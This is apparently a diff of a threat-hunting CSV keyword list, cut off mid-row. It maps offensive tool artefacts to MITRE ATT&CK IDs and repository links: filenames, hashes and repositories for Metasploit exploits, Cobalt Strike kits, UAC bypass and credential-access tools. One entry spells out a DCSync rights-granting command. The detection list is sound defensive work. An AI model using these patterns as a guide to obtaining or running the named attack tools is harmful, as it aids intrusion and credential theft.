TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*cve_2020_0796_smbghost.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*cve-20.x64.dll*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"*cve-20.x86.dll*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*CVE_20*.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*cve_2019_0708_bluekeep_fail*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cve_2019_0708_bluekeep_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cve_2020_0796_smbghost.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cve-20.x64.dll*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*cve-20.x86.dll*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*CVE-2020-5902-Scanner/scanner.py*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/aqhmal/CVE-2020-5902-Scanner","1","0","N/A","N/A","1","54","22","2022-12-08T11:03:15Z","2020-07-05T06:19:09Z" "*CVE-2021-34527.ps1*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cve-20220-26809_exploit.py*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" -"*CVE-2022-21882.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*CVE-2022-21882.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*cve-2022-23131.py *","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/L0ading-x/cve-2022-23131","1","0","N/A","N/A","1","23","11","2022-02-22T01:45:34Z","2022-02-22T01:39:52Z" "*cve-2022-26809-scanVuln.py*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" "*CVE-2022-30190-follina-Office-MSDT-Fixed*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","387","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" @@ -9033,9 +9181,9 @@ "*-d kali-linux *","offensive_tool_keyword","kali","Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*D00MFist/Mystikal*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" "*D00Movenok/HTMLSmuggler*","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","1","97","13","2023-09-13T22:26:51Z","2023-07-02T08:10:59Z" -"*d090766c75d998b019d651fbb0c04112c6feb0f754628751682708e13baf2744*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*d090766c75d998b019d651fbb0c04112c6feb0f754628751682708e13baf2744*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*d091e408c0c5068b86bb69d17e91c5a7d6da46c0bd4101aa14f136246aed7f51*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" -"*d09ccee4-pass-word-0000-98677e2356fd*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*d09ccee4-pass-word-0000-98677e2356fd*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" "*d0ebb728926cce530040e046a8ea2f47e01158581cb0b5cccddc91007b421f6c*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*D1rkInject.cpp*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*D1rkInject.exe*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" @@ -9050,16 +9198,16 @@ "*d38210acb6d0568559041036abd033953c4080170e1ea9cf5d4d8499b54141b7*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*d3ckx1/Crack-allDBs*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" "*d494a4bc-3867-436a-93ef-737f9e0522eb*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" -"*d4acf557a541579d5a8992b9514169fc05c40f26144ad8a560d8ef8d0a3cce0e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*d4acf557a541579d5a8992b9514169fc05c40f26144ad8a560d8ef8d0a3cce0e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*D4Vinci*","offensive_tool_keyword","Github Username","Github user: A hacker. high&low-level coder and a lot of things between. An extremely curious creature loves to learn. Break things or make things that break things.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/D4Vinci/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*d7fbfd69df3840022dab1f8f2d529ce04abac8cee0234448bfd0a67feb6aea22*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*d7fbfd69df3840022dab1f8f2d529ce04abac8cee0234448bfd0a67feb6aea22*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*DA230B64-14EA-4D49-96E1-FA5EFED9010B*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" -"*da26a5e6b6a29023ee4ab6b54fd24ab13bebed4bcaaac910379119463bba62fa*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*da50f691771c3694ae8821095113a29cf3333e728a31a56f25d08c1a43c9e173*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*da26a5e6b6a29023ee4ab6b54fd24ab13bebed4bcaaac910379119463bba62fa*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*da50f691771c3694ae8821095113a29cf3333e728a31a56f25d08c1a43c9e173*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*dacledit.py -action write -rights DCSync -principal * -target-dn *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*daem0nc0re/PrivFu*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*dafthack/HostRecon*","offensive_tool_keyword","HostRecon","Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. or other system commands to help avoid detection.","T1082 - T1087 - T1033","TA0001 - TA0007 - ","N/A","N/A","Information Gathering","https://github.com/dafthack/HostRecon","1","1","N/A","N/A","5","401","114","2017-10-03T13:25:06Z","2017-03-28T14:53:21Z" -"*dafthack/MailSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*dafthack/MailSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*dafthack/MFASweep*","offensive_tool_keyword","FMFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1033","152","2023-07-25T05:10:55Z","2020-09-22T16:25:03Z" "*DallasFR/Cobalt-Clip*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","","N/A","","","" "*DallasFR/WinShellcode*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -9070,20 +9218,20 @@ "*danielmiessler/SecLists.git*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*DanMcInerney/Empire*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential 